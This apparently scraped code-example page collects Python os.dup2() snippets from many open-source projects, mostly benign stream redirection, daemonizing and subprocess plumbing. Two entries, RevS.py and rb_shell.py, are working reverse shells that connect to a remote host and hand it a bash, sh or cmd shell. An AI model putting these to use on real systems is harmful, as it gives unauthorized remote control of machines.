python类dup2()的实例源码

popen2.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        """Fork a child for *cmd*, wired to this object through two pipes.

        One pipe feeds the child's stdin; the other carries the child's
        stdout and stderr together.  The parent ends are exposed as
        ``self.tochild`` (writable) and ``self.fromchild`` (readable), both
        opened with *bufsize*.  The child's pid is stored in ``self.pid``.
        """
        _cleanup()
        self.cmd = cmd
        child_stdin, parent_write = os.pipe()
        parent_read, child_output = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child: install the pipe ends as fds 0, 1 and 2 (stdout and
            # stderr share one pipe), then hand over to _run_child.
            # NOTE(review): _run_child is presumably expected never to
            # return; otherwise the child would fall into the parent code.
            wiring = ((child_stdin, 0), (child_output, 1), (child_output, 2))
            for pipe_end, std_fd in wiring:
                os.dup2(pipe_end, std_fd)
            self._run_child(cmd)
        # Parent: drop the ends that belong to the child and wrap our own.
        os.close(child_stdin)
        self.tochild = os.fdopen(parent_write, 'w', bufsize)
        os.close(child_output)
        self.fromchild = os.fdopen(parent_read, 'r', bufsize)
RevS.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 122 收藏 0 点赞 0 评论 0
def proceso():
    """Connect a TCP socket to a remote host and run ``/bin/bash`` over it.

    The host and port are taken from ``sys.argv[1]`` and ``sys.argv[2]``.
    Once connected, the socket descriptor is duplicated over the process's
    stdin and stdout, a text banner is sent, and ``/bin/bash`` is started
    repeatedly through ``os.system``.

    The outer loop has no exit condition, so after the arguments are parsed
    this function does not return.
    """
    host = str(sys.argv[1])
    puerto = int(sys.argv[2])
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while 1:
        # NOTE(review): the bare ``except`` below swallows every exception
        # (including KeyboardInterrupt and SystemExit) and immediately
        # retries with the same socket object, with no delay between tries.
        try:
            s.connect((host, puerto))
            # Make fds of sys.stdin / sys.stdout refer to the socket.
            # stderr is not redirected here.
            os.dup2(s.fileno(), sys.stdin.fileno())
            os.dup2(s.fileno(), sys.stdout.fileno())

            # Banner sent to the remote end.
            s.sendall(('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'))
            s.sendall(('~~         Python Reverse shell     ~~\n'))
            s.sendall(('~~  Kalith: Kalith[at]gmail[dot]com ~~\n'))
            s.sendall(('~~            http//0x59.es         ~~\n'))
            s.sendall(('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'))

            # Restart the shell every time it exits.
            while 1:
                os.system('/bin/bash')
        except:
            pass
prompters.py 文件源码 项目:questionnaire 作者: kylebebak 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def stdout_redirected(to):
    """Generator that points the stdout file descriptor at *to* while suspended.

    Adapted from
    https://stackoverflow.com/questions/4675728/redirect-stdout-to-a-file-in-python

    Redirecting at the descriptor level is the only approach found to work
    together with curses: questionnaire's own output can be piped to another
    program without also piping what the prompters draw on the terminal.

    *to* is first handed to ``fileno()``; if that raises ``ValueError`` it is
    treated as a filename and opened for binary writing.  The generator
    yields the ``sys.stdout`` object captured on entry and restores the
    descriptor when resumed or closed.
    """
    stream = sys.stdout
    target_fd = fileno(stream)

    # Keep a duplicate of the current descriptor so it can be put back later.
    with os.fdopen(os.dup(target_fd), 'wb') as saved:
        # dup2 knows nothing about Python-level buffers, so empty them first.
        stream.flush()
        try:
            os.dup2(fileno(to), target_fd)  # like: exec >&to
        except ValueError:
            # `to` is a filename rather than something with a descriptor.
            with open(to, 'wb') as opened:
                os.dup2(opened.fileno(), target_fd)  # like: exec > to
        try:
            # The caller's code runs here with stdout redirected.
            yield stream
        finally:
            # Flush what was written during the redirect, then undo it.
            stream.flush()
            os.dup2(saved.fileno(), target_fd)
capture.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 40 收藏 0 点赞 0 评论 0
def start(self):
        """Begin capturing on ``self.targetfd``.

        Raises ``ValueError`` when the saved descriptor ``self._savefd`` is
        no longer valid.  When the target is fd 0 and no temp file is set,
        fd 0 is pointed at the null device opened read-only; otherwise the
        temp file's descriptor is duplicated onto the target.  If the
        instance has an ``_oldsys`` attribute, the matching ``sys``
        attribute (looked up in ``patchsysdict``) is replaced as well.
        """
        try:
            os.fstat(self._savefd)
        except OSError:
            raise ValueError("saved filedescriptor not valid, "
                "did you call start() twice?")

        stdin_without_tmpfile = self.targetfd == 0 and not self.tmpfile
        if stdin_without_tmpfile:
            # Nothing to feed stdin from: point it at the null device.
            null_fd = os.open(devnullpath, os.O_RDONLY)
            os.dup2(null_fd, 0)
            os.close(null_fd)
        else:
            os.dup2(self.tmpfile.fileno(), self.targetfd)

        if hasattr(self, '_oldsys'):
            # Also swap the Python-level stream object on the sys module.
            setattr(sys, patchsysdict[self.targetfd],
                    DontReadFromInput() if stdin_without_tmpfile
                    else self.tmpfile)
capture.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def writeorg(self, data):
        """Write *data* to the original file descriptor (``self._savefd``).

        A throwaway temporary file object is created and its descriptor is
        replaced with a duplicate of ``self._savefd``; writing through that
        object and closing it delivers *data* to the saved descriptor
        without closing ``self._savefd`` itself.
        """
        with tempfile.TemporaryFile() as scratch:
            os.dup2(self._savefd, scratch.fileno())
            scratch.write(data)
_twistd_unix.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def daemonize():
    """Detach the current process and point fds 0-2 at ``/dev/null``.

    Performs the classic double fork with ``setsid()`` in between (each
    parent exits immediately through ``os._exit(0)``), sets the umask to
    ``0o077`` and then duplicates a read/write ``/dev/null`` descriptor
    onto descriptors 0, 1 and 2.

    Raises ``OSError`` if duplicating fails for any reason other than
    ``EBADF``.
    """
    # See http://www.erlenstar.demon.co.uk/unix/faq_toc.html#TOC16
    if os.fork():   # launch child and...
        os._exit(0) # kill off parent
    os.setsid()
    if os.fork():   # launch child and...
        os._exit(0) # kill off parent again.
    # 0o077 / "except ... as" are accepted by Python 2.6+ and Python 3,
    # unlike the older "077" / "except OSError, e" spellings.
    os.umask(0o077)
    null = os.open('/dev/null', os.O_RDWR)
    for i in range(3):
        try:
            os.dup2(null, i)
        except OSError as e:
            if e.errno != errno.EBADF:
                raise
    # If a standard descriptor was closed on entry, os.open() returns that
    # very number (0, 1 or 2); closing it here would undo the redirection.
    if null > 2:
        os.close(null)
popen2.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        """Fork a child for *cmd*, wired to this object through two pipes.

        One pipe feeds the child's stdin; the other carries the child's
        stdout and stderr together.  The parent ends are exposed as
        ``self.tochild`` (writable) and ``self.fromchild`` (readable), both
        opened with *bufsize*.  The child's pid is stored in ``self.pid``.
        """
        _cleanup()
        self.cmd = cmd
        child_stdin, parent_write = os.pipe()
        parent_read, child_output = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child: install the pipe ends as fds 0, 1 and 2 (stdout and
            # stderr share one pipe), then hand over to _run_child.
            # NOTE(review): _run_child is presumably expected never to
            # return; otherwise the child would fall into the parent code.
            wiring = ((child_stdin, 0), (child_output, 1), (child_output, 2))
            for pipe_end, std_fd in wiring:
                os.dup2(pipe_end, std_fd)
            self._run_child(cmd)
        # Parent: drop the ends that belong to the child and wrap our own.
        os.close(child_stdin)
        self.tochild = os.fdopen(parent_write, 'w', bufsize)
        os.close(child_output)
        self.fromchild = os.fdopen(parent_read, 'r', bufsize)
test_selectors.py 文件源码 项目:annotated-py-asyncio 作者: hhstore 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def test_unregister_after_fd_close_and_reuse(self):
        # Register two descriptors, close their sockets, make the same
        # descriptor numbers refer to a different socket pair via dup2, and
        # check that unregistering by number still works.
        selector = self.SELECTOR()
        self.addCleanup(selector.close)

        first_rd, first_wr = self.make_socketpair()
        rd_fd, wr_fd = first_rd.fileno(), first_wr.fileno()
        selector.register(rd_fd, selectors.EVENT_READ)
        selector.register(wr_fd, selectors.EVENT_WRITE)

        second_rd, second_wr = self.make_socketpair()
        first_rd.close()
        first_wr.close()
        # Reuse the now-free descriptor numbers for the second pair.
        os.dup2(second_rd.fileno(), rd_fd)
        os.dup2(second_wr.fileno(), wr_fd)
        for reused_fd in (rd_fd, wr_fd):
            self.addCleanup(os.close, reused_fd)

        for reused_fd in (rd_fd, wr_fd):
            selector.unregister(reused_fd)
generator.py 文件源码 项目:OSPTF 作者: xSploited 项目源码 文件源码 阅读 47 收藏 0 点赞 0 评论 0
def generate(self):
        """Return the source text of a script snippet, dedented.

        The returned text, when run where ``os.name == 'posix'``, sets
        ``pupy.infos['daemonize']``, forks twice with ``os.setsid()`` in
        between (each parent exits through ``os._exit(0)``), sets the umask
        to 022 and duplicates a ``/dev/null`` descriptor onto fds 0-2.
        """
        # NOTE(review): the embedded text uses Python 2-only syntax
        # (``022``, ``except OSError, e``) and refers to ``errno`` although
        # it only imports ``pupy`` and ``os`` -- confirm the environment it
        # runs in provides that name.
        return textwrap.dedent("""
        import pupy, os

        if os.name == 'posix':
            pupy.infos['daemonize']=True
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent
            os.setsid()
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent again.
            os.umask(022)   # Don't allow others to write
            null=os.open('/dev/null', os.O_RDWR)
            for i in range(3):
                try:
                    os.dup2(null, i)
                except OSError, e:
                    if e.errno != errno.EBADF:
                        raise
            os.close(null)
        """)
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 51 收藏 0 点赞 0 评论 0
def create_child(*args):
    """Fork and exec *args* with its stdin/stdout attached to a socketpair.

    In the child, one end of the pair is switched to blocking mode via
    ``mitogen.core.set_block`` and duplicated onto fds 0 and 1 before
    ``os.execvp(args[0], args)``.

    Returns ``(pid, fd)`` in the parent, where *fd* is a duplicate of the
    parent's end of the socketpair.
    """
    parent_sock, child_sock = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child process.
        child_fd = child_sock.fileno()
        mitogen.core.set_block(child_fd)
        for std_fd in (0, 1):
            os.dup2(child_fd, std_fd)
        child_sock.close()
        parent_sock.close()
        os.execvp(args[0], args)

    # Parent process: the child's end is not needed here.
    child_sock.close()
    # Duplicate the descriptor so it outlives the Python socket object.
    detached_fd = os.dup(parent_sock.fileno())
    parent_sock.close()

    LOG.debug('create_child() child %d fd %d, parent %d, cmd: %s',
              pid, detached_fd, os.getpid(), Argv(args))
    return pid, detached_fd
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def tty_create_child(*args):
    """Fork and exec *args* with fds 0-2 attached to a new pseudo-terminal.

    Echo is disabled on both ends of the pty before forking.  The child
    duplicates the slave end onto fds 0, 1 and 2, closes non-standard
    descriptors, starts a new session and execs ``args[0]``.

    Returns ``(pid, master_fd)`` in the parent.
    """
    master_fd, slave_fd = os.openpty()
    for pty_fd in (master_fd, slave_fd):
        disable_echo(pty_fd)

    pid = os.fork()
    if pid == 0:
        # Child process.
        mitogen.core.set_block(slave_fd)
        for std_fd in (0, 1, 2):
            os.dup2(slave_fd, std_fd)
        close_nonstandard_fds()
        os.setsid()
        # Open and immediately close the tty behind fd 1 after setsid().
        # NOTE(review): presumably this makes it the controlling terminal
        # of the new session -- confirm.
        tty_path = os.ttyname(1)
        os.close(os.open(tty_path, os.O_RDWR))
        os.execvp(args[0], args)

    # Parent process: only the master end is kept.
    os.close(slave_fd)
    LOG.debug('tty_create_child() child %d fd %d, parent %d, cmd: %s',
              pid, master_fd, os.getpid(), Argv(args))
    return pid, master_fd
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 38 收藏 0 点赞 0 评论 0
# First-stage bootstrap.
#
# Creates two pipes, (R, W) and (r, w), then forks.
#
# In the process where fork() returns non-zero, the current stdin is saved
# as fd 100, the read end R becomes fd 0, the read end r becomes fd 101, all
# four original pipe descriptors are closed, ARGV0 is set in the environment
# to sys.executable, and the interpreter is re-executed with argv[0] set to
# 'mitogen:CONTEXT_NAME'.
#
# The other process writes 'EC0\n' to fd 1, reads from stdin the number of
# bytes given by input(), zlib-decompresses them, writes the result to W and
# a length-prefixed copy to w, writes 'EC1\n' to fd 1 and exits with status 0.
#
# NOTE(review): the body appears to target Python 2 (input() used to obtain
# an integer, str passed to os.write, unbuffered text-mode fdopen), and its
# terse style suggests the source text itself may be shipped verbatim --
# confirm before reformatting or adding anything inside the function.
def _first_stage():
        import os,sys,zlib
        R,W=os.pipe()
        r,w=os.pipe()
        if os.fork():
            os.dup2(0,100)
            os.dup2(R,0)
            os.dup2(r,101)
            for f in R,r,W,w:os.close(f)
            os.environ['ARGV0']=e=sys.executable
            os.execv(e,['mitogen:CONTEXT_NAME'])
        os.write(1,'EC0\n')
        C=zlib.decompress(sys.stdin.read(input()))
        os.fdopen(W,'w',0).write(C)
        os.fdopen(w,'w',0).write('%s\n'%len(C)+C)
        os.write(1,'EC1\n')
        sys.exit(0)
rb_shell.py 文件源码 项目:Scripts 作者: hxer 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def conn(ip,port):
    """Connect to ``(ip, port)`` and run a command interpreter over the socket.

    :param ip: remote address; converted with ``str()``.
    :param port: remote port; converted with ``int()``.

    After connecting, the socket descriptor is duplicated onto fds 0, 1 and
    2.  If ``/bin/sh`` exists it is run with ``-i``; otherwise, if the
    Windows ``cmd.exe`` path exists, that is run instead.  When neither is
    found, two messages are printed and ``exit()`` is called.

    Written for Python 2 (``print`` statements).
    """
    ip = str(ip)
    port = int(port)
    linux_bash = "/bin/sh"
    windows_cmd = "C:\Windows\System32\cmd.exe"
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip, port))
    # Printed before the redirection below, so it goes to the local stdout.
    print "[*] Connect Success"
    # From here on fds 0-2 refer to the socket, so later prints are sent to
    # the remote end.
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    if os.path.exists(linux_bash):
        # NOTE(review): the return code stored in ``p`` is never used.
        p=subprocess.call([linux_bash,"-i"]);
        print "[*] This shell rebound to",ip,port
    elif os.path.exists(windows_cmd):
        # NOTE(review): "-i" is passed to cmd.exe as well -- confirm intended.
        p=subprocess.call([windows_cmd,"-i"]);
        print "[*] This shell rebound to",ip,port
    else:
        print "[!] The Command Controler Not Found, I will exit\n"
        print "[!] Please check ",linux_bash,"or",windows_cmd
        exit()
daemon.py 文件源码 项目:bitmask-dev 作者: leapcode 项目源码 文件源码 阅读 50 收藏 0 点赞 0 评论 0
def redirect_stream(system_stream, target_stream):
    """ Redirect a system stream to a specified file.

        :param system_stream: A file object representing a standard I/O
            stream.
        :param target_stream: The target file object for the redirected
            stream, or ``None`` to specify the null device.
        :return: ``None``.

        `system_stream` is a standard system stream such as
        ``sys.stdout``. `target_stream` is an open file object that
        should replace the corresponding system stream object.

        If `target_stream` is ``None``, defaults to opening the
        operating system's null device and using its file descriptor.
        That temporary descriptor is closed again once it has been
        duplicated onto the system stream, so repeated calls do not
        accumulate open descriptors.

        """
    if target_stream is None:
        # We own this descriptor: after dup2 the system stream holds its
        # own reference to the null device, so release ours.
        null_fd = os.open(os.devnull, os.O_RDWR)
        try:
            os.dup2(null_fd, system_stream.fileno())
        finally:
            os.close(null_fd)
    else:
        # The caller owns target_stream; only duplicate its descriptor.
        os.dup2(target_stream.fileno(), system_stream.fileno())
generator.py 文件源码 项目:pupy 作者: ru-faraon 项目源码 文件源码 阅读 52 收藏 0 点赞 0 评论 0
def generate(self):
        """Return the source text of a script snippet, dedented.

        The returned text, when run where ``os.name == 'posix'``, sets
        ``pupy.infos['daemonize']``, forks twice with ``os.setsid()`` in
        between (each parent exits through ``os._exit(0)``), sets the umask
        to 022 and duplicates a ``/dev/null`` descriptor onto fds 0-2.
        """
        # NOTE(review): the embedded text uses Python 2-only syntax
        # (``022``, ``except OSError, e``) and refers to ``errno`` although
        # it only imports ``pupy`` and ``os`` -- confirm the environment it
        # runs in provides that name.
        return textwrap.dedent("""
        import pupy, os

        if os.name == 'posix':
            pupy.infos['daemonize']=True
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent
            os.setsid()
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent again.
            os.umask(022)   # Don't allow others to write
            null=os.open('/dev/null', os.O_RDWR)
            for i in range(3):
                try:
                    os.dup2(null, i)
                except OSError, e:
                    if e.errno != errno.EBADF:
                        raise
            os.close(null)
        """)
util.py 文件源码 项目:qiime2 作者: qiime2 项目源码 文件源码 阅读 46 收藏 0 点赞 0 评论 0
def _redirected_fd(to=os.devnull, stdio=None):
    """Generator that points a standard stream's descriptor at *to*.

    *stdio* defaults to ``sys.stdout``.  *to* is first handed to
    ``_get_fileno()``; if that raises ``ValueError`` it is treated as a
    filename and opened for binary writing.  The stream object is yielded
    while the redirect is in effect, and the original descriptor is put
    back when the generator is resumed or closed.
    """
    stream = sys.stdout if stdio is None else stdio
    stream_fd = _get_fileno(stream)

    # Keep a duplicate of the descriptor so it can be restored afterwards.
    # NOTE: on Windows the duplicate is inheritable when the source is a
    # standard stream.
    with os.fdopen(os.dup(stream_fd), 'wb') as saved:
        # dup2 knows nothing about Python-level buffers, so empty them first.
        stream.flush()
        try:
            os.dup2(_get_fileno(to), stream_fd)  # like: exec >&to
        except ValueError:
            # `to` is a filename rather than something with a descriptor.
            with open(to, 'wb') as opened:
                os.dup2(opened.fileno(), stream_fd)  # like: exec > to
        try:
            # The caller's code runs here with the stream redirected.
            yield stream
        finally:
            # Put the original descriptor back.
            # NOTE: dup2 makes stream_fd inheritable unconditionally.
            stream.flush()
            os.dup2(saved.fileno(), stream_fd)  # like: exec >&saved
test_multiprocessing.py 文件源码 项目:zippy 作者: securesystemslab 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        # Sends a descriptor numbered 256 or above to a child process and
        # checks that the child could write through it.
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        writer = self.Process(target=self._writefd,
                              args=(child_conn, b"bar", True))
        writer.daemon = True
        writer.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as out:
            source_fd = out.fileno()
            # First descriptor number >= 256 that is not currently in use.
            high_fd = next(
                (candidate for candidate in range(256, MAXFD)
                 if not self._is_fd_assigned(candidate)),
                None)
            if high_fd is None:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(source_fd, high_fd)
            try:
                reduction.send_handle(conn, high_fd, writer.pid)
            finally:
                os.close(high_fd)
        writer.join()
        with open(test.support.TESTFN, "rb") as written:
            self.assertEqual(written.read(), b"bar")
test_facade.py 文件源码 项目:landscape-client 作者: CanonicalLtd 项目源码 文件源码 阅读 48 收藏 0 点赞 0 评论 0
def _mock_output_restore(self):
        """
        Install mocks that let a test verify stdout and stderr are restored
        after they have been captured.

        ``tempfile.mkstemp`` is patched to hand back a temp file created
        here, ``os.dup`` is patched to return duplicates of fds 1 and 2
        taken here, and ``os.dup2`` is wrapped so its calls are recorded.
        All patches are undone through ``addCleanup``.

        Return the path of the temp file and the ``os.dup2`` mock.
        """
        # Real duplicates, taken before os.dup is replaced by a mock.
        saved_fds = {1: os.dup(1), 2: os.dup(2)}
        capture_file = tempfile.mkstemp()  # (fd, path)
        outfile = capture_file[1]

        mkstemp_patcher = mock.patch("tempfile.mkstemp")
        mkstemp_mock = mkstemp_patcher.start()
        self.addCleanup(mkstemp_patcher.stop)
        mkstemp_mock.return_value = capture_file

        dup_patcher = mock.patch("os.dup")
        dup_mock = dup_patcher.start()
        self.addCleanup(dup_patcher.stop)
        dup_mock.side_effect = lambda fd: saved_fds[fd]

        # wraps= keeps the real dup2 behaviour while recording calls.
        dup2_patcher = mock.patch("os.dup2", wraps=os.dup2)
        dup2_mock = dup2_patcher.start()
        self.addCleanup(dup2_patcher.stop)
        return outfile, dup2_mock
watchdog.py 文件源码 项目:landscape-client 作者: CanonicalLtd 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def daemonize():
    """Detach the current process and point fds 0-2 at ``/dev/null``.

    Performs the classic double fork with ``setsid()`` in between (each
    parent exits immediately through ``os._exit(0)``), sets the umask to
    ``0o077`` and then duplicates a read/write ``/dev/null`` descriptor
    onto descriptors 0, 1 and 2.

    Raises ``OSError`` if duplicating fails for any reason other than
    ``EBADF``.
    """
    # See http://www.steve.org.uk/Reference/Unix/faq_2.html#SEC16
    if os.fork():  # launch child and...
        os._exit(0)  # kill off parent
    os.setsid()
    if os.fork():  # launch child and...
        os._exit(0)  # kill off parent again.
    # some argue that this umask should be 0, but that's annoying.
    os.umask(0o077)
    null = os.open('/dev/null', os.O_RDWR)
    for i in range(3):
        try:
            os.dup2(null, i)
        except OSError as e:
            if e.errno != errno.EBADF:
                raise
    # If a standard descriptor was closed on entry, os.open() returns that
    # very number (0, 1 or 2); closing it here would undo the redirection.
    if null > 2:
        os.close(null)
glogging.py 文件源码 项目:ShelbySearch 作者: Agentscreech 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def reopen_files(self):
        """Reopen the error log and every ``FileHandler`` stream.

        When output capture is enabled and the error log is not ``"-"``,
        stdout and stderr are flushed, the log file is reopened in append
        mode under ``self.lock`` and its descriptor is duplicated onto the
        stdout and stderr descriptors.  Afterwards each open
        ``logging.FileHandler`` stream of the loggers returned by
        ``loggers()`` is closed and reopened.
        """
        capturing = self.cfg.capture_output and self.cfg.errorlog != "-"
        if capturing:
            for std_stream in (sys.stdout, sys.stderr):
                std_stream.flush()

            with self.lock:
                if self.logfile is not None:
                    self.logfile.close()
                self.logfile = open(self.cfg.errorlog, 'a+')
                for std_stream in (sys.stdout, sys.stderr):
                    os.dup2(self.logfile.fileno(), std_stream.fileno())

        for logger in loggers():
            for handler in logger.handlers:
                if not isinstance(handler, logging.FileHandler):
                    continue
                # Hold the handler's own lock while swapping its stream.
                handler.acquire()
                try:
                    if handler.stream:
                        handler.stream.close()
                        handler.stream = open(handler.baseFilename,
                                              handler.mode)
                finally:
                    handler.release()
wurlitzer.py 文件源码 项目:ipybind 作者: aldanor 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def _setup_pipe(self, name):
        """Replace the descriptor of ``sys.__<name>__`` with a pipe.

        A duplicate of the original descriptor is stored in
        ``self._save_fds[name]`` and the descriptor number itself in
        ``self._real_fds[name]``.

        Returns the read end of the pipe, switched to non-blocking mode.
        """
        import fcntl

        target_fd = getattr(sys, '__%s__' % name).fileno()
        # Remember where the descriptor pointed so it can be restored later.
        self._save_fds[name] = os.dup(target_fd)

        read_end, write_end = os.pipe()
        # Writes to target_fd now land in the pipe; the separate write-end
        # descriptor is no longer needed once duplicated.
        os.dup2(write_end, target_fd)
        os.close(write_end)
        self._real_fds[name] = target_fd

        # Make the read end non-blocking.
        current_flags = fcntl.fcntl(read_end, fcntl.F_GETFL)
        fcntl.fcntl(read_end, fcntl.F_SETFL, current_flags | os.O_NONBLOCK)
        return read_end
wurlitzer.py 文件源码 项目:ipybind 作者: aldanor 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def __exit__(self, exc_type, exc_value, traceback):
        """Stop capturing: flush, close the redirected fds and restore them.

        The exception arguments are not inspected and nothing is returned.
        """
        # Flush the C-level stdio buffers.
        for c_stream in (c_stdout_p, c_stderr_p):
            libc.fflush(c_stream)
        time.sleep(0.025)  # a real cheesy way to avoid potential segfaults

        # Closing the redirected descriptors signals that output is complete.
        for redirected_fd in self._real_fds.values():
            os.close(redirected_fd)
        self.thread.join()

        # Put every descriptor back to what it was before capturing.
        for stream_name, redirected_fd in self._real_fds.items():
            saved_fd = self._save_fds[stream_name]
            try:
                os.dup2(saved_fd, redirected_fd)
            except OSError:
                # One retry; a second failure propagates.
                os.dup2(saved_fd, redirected_fd)
            os.close(saved_fd)

        # Finalize the handle.
        self._finish_handle()
pager.py 文件源码 项目:gerrymanderer 作者: emusical 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def start_pager():
    """Route this process's stdout through a pager when stdout is a tty.

    Does nothing when stdout is not a terminal or ``get_pager()`` returns
    nothing.  Otherwise the pager is started with its stdout on the
    current terminal, the process handle is stored in the module-level
    ``pagerproc``, and fd 1 is replaced with the pager's stdin pipe.
    ``LESS`` is set to ``FRSX`` in the environment unless already present.
    """
    global pagerproc

    if not sys.stdout.isatty():
        return

    pager = get_pager()
    if not pager:
        return

    os.environ.setdefault("LESS", "FRSX")

    # The pager writes to a duplicate of our current stdout.
    terminal_fd = os.dup(1)
    pagerproc = subprocess.Popen(
        [pager],
        stdin=subprocess.PIPE,
        stdout=terminal_fd,
        close_fds=True,
    )
    os.close(terminal_fd)

    # From now on everything written to fd 1 goes into the pager.
    os.dup2(pagerproc.stdin.fileno(), 1)
setupext.py 文件源码 项目:yt 作者: yt-project 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def stdchannel_redirected(stdchannel, dest_filename):
    """
    A context manager to temporarily redirect stdout or stderr

    e.g.:

    with stdchannel_redirected(sys.stderr, os.devnull):
        if compiler.has_function('clock_gettime', libraries=['rt']):
            libraries.append('rt')

    Code adapted from https://stackoverflow.com/a/17752455/1382869

    :param stdchannel: file object whose descriptor is redirected.
    :param dest_filename: path opened for writing to receive the output.

    If setting up the redirection fails (for example ``dest_filename``
    cannot be opened), the original error propagates and whatever had
    already been set up is undone.  The duplicate of the original
    descriptor is closed after it has been restored.
    """
    # Bind both names up front so the cleanup below can tell which setup
    # steps were reached.
    oldstdchannel = None
    dest_file = None
    try:
        oldstdchannel = os.dup(stdchannel.fileno())
        dest_file = open(dest_filename, 'w')
        os.dup2(dest_file.fileno(), stdchannel.fileno())

        yield
    finally:
        try:
            if oldstdchannel is not None:
                try:
                    os.dup2(oldstdchannel, stdchannel.fileno())
                finally:
                    # The saved duplicate is ours; do not leak it.
                    os.close(oldstdchannel)
        finally:
            if dest_file is not None:
                dest_file.close()
memory_util.py 文件源码 项目:Master-R-CNN 作者: Mark110 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def __exit__(self, exc_type, exc_value, traceback):
    """Make ``self.fd`` refer again to the descriptor held in ``self.prevfd``.

    The exception arguments are ignored and nothing is returned.
    """
    saved_fd = self.prevfd
    redirected_fd = self.fd
    os.dup2(saved_fd, redirected_fd)


################################################################################
# LOG_MEMORY_PARSING
################################################################################
# Until https://github.com/tensorflow/tensorflow/issues/6716 is resolved, the
# reliable way to get access to tensor deallocation information is to parse
# __LOG_MEMORY__ from VLOG print statements. This is sensitive to print order,
# so run unbuffered to prevent interleaving:
#   python -u script.py

# Regex'es to parse __LOG_MEMORY__ statements
# Each regex is preceded by an example of line it's meant to pass

# I 5143420588.000000 file tensorflow/core/framework/log_memory.cc:41] __LOG_MEMORY__ MemoryLogTensorAllocation { step_id: -6 kernel_name: "Unknown (from Proto)" tensor { dtype: DT_INT32 shape { dim { size: 3 } } allocation_description { requested_bytes: 12 allocated_bytes: 12 allocator_name: "cpu" allocation_id: 3 has_single_reference: true ptr: 29496256 } } }
process.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def Pop(self):
    """Undo the most recently pushed frame of descriptor changes.

    Saved descriptors are restored in reverse order and then closed
    (``self.next_fd`` is decremented once for each), descriptors listed in
    the frame's ``need_close`` are closed, and finally every process in
    ``need_wait`` is waited for.  An ``OSError`` from dup2 or close is
    logged and re-raised.
    """
    popped = self.stack.pop()

    # Restore in the opposite order to which the descriptors were saved.
    for saved_fd, original_fd in reversed(popped.saved):
      try:
        os.dup2(saved_fd, original_fd)
      except OSError as err:
        log('dup2(%d, %d) error: %s', saved_fd, original_fd, err)
        raise
      os.close(saved_fd)
      self.next_fd -= 1  # Count down

    for pending_fd in popped.need_close:
      try:
        os.close(pending_fd)
      except OSError as err:
        log('Error closing descriptor %d: %s', pending_fd, err)
        raise

    # Wait for here doc processes to finish; their status is not used.
    for proc, waiter in popped.need_wait:
      proc.WaitUntilDone(waiter)
popen2.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 41 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        """Fork a child for *cmd*, wired to this object through two pipes.

        One pipe feeds the child's stdin; the other carries the child's
        stdout and stderr together.  The parent ends are exposed as
        ``self.tochild`` (writable) and ``self.fromchild`` (readable), both
        opened with *bufsize*.  The child's pid is stored in ``self.pid``.
        """
        _cleanup()
        self.cmd = cmd
        child_stdin, parent_write = os.pipe()
        parent_read, child_output = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child: install the pipe ends as fds 0, 1 and 2 (stdout and
            # stderr share one pipe), then hand over to _run_child.
            # NOTE(review): _run_child is presumably expected never to
            # return; otherwise the child would fall into the parent code.
            wiring = ((child_stdin, 0), (child_output, 1), (child_output, 2))
            for pipe_end, std_fd in wiring:
                os.dup2(pipe_end, std_fd)
            self._run_child(cmd)
        # Parent: drop the ends that belong to the child and wrap our own.
        os.close(child_stdin)
        self.tochild = os.fdopen(parent_write, 'w', bufsize)
        os.close(child_output)
        self.fromchild = os.fdopen(parent_read, 'r', bufsize)
test_multiprocessing.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
